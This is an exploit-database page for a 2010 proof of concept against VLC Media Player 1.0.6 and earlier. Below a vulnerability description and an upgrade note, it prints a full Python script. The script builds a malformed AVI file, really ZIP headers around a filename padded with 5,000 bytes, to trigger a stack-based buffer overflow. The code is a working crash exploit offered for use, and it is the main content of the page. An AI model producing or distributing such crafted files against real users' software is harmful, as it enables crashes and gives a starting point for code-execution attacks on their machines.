header-logo
Suggest Exploit
vendor:
VLC Media Player
by:
Dr_IDE
9,3
CVSS
HIGH
Malformed Media File Crash
119
CWE
Product Name: VLC Media Player
Affected Version From: <=1.0.6
Affected Version To: <=1.0.6
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7, Ubuntu 9, OSX 10.6.X
2010

VLC Media Player <=1.0.6 Malformed Media File Crash PoC

VLC Media Player version <=1.0.6 is vulnerable to a malformed media file crash. The vulnerability is caused due to a boundary error when handling malformed media files and can be exploited to cause a stack-based buffer overflow via an overly long filename in a specially crafted AVI file. Successful exploitation may allow execution of arbitrary code.

Mitigation:

Upgrade to the latest version of VLC Media Player.
Source

Exploit-DB raw data:

#!/usr/bin/python

######################################################################################################
#
# VLC Media Player <=1.0.6 Malformed Media File Crash PoC
# Found By: Dr_IDE
# Tested:   Windows 7, Ubuntu 9, OSX 10.6.X
# Download: http://www.videolan.org
# Notes:	Register overwrites seem very unpredictable at best...
# Greets:	Offsec and Corelan Teams
#
######################################################################################################
 
ldf_header = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00")
 
cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00\x24\x00\x00"
"\x00\x00\x00\x00\x00")
 
eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
"\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00")
 
filename = "VLC_Doesnt_Like_Videos_That_Are_Really_Zip_Files.AVI"
 
exploit = filename
exploit += "\x41" * 5000
 
print "[+] Writing file"

file = open('boom.avi','w'); #Anything here works, mpg, mp4, asf, mov etc...
file.write(ldf_header + exploit + cdf_header + exploit + eofcdf_header);
file.close()

print "[+] Exploit file created!!"

Navigation

Suggest Exploit

Services By CQR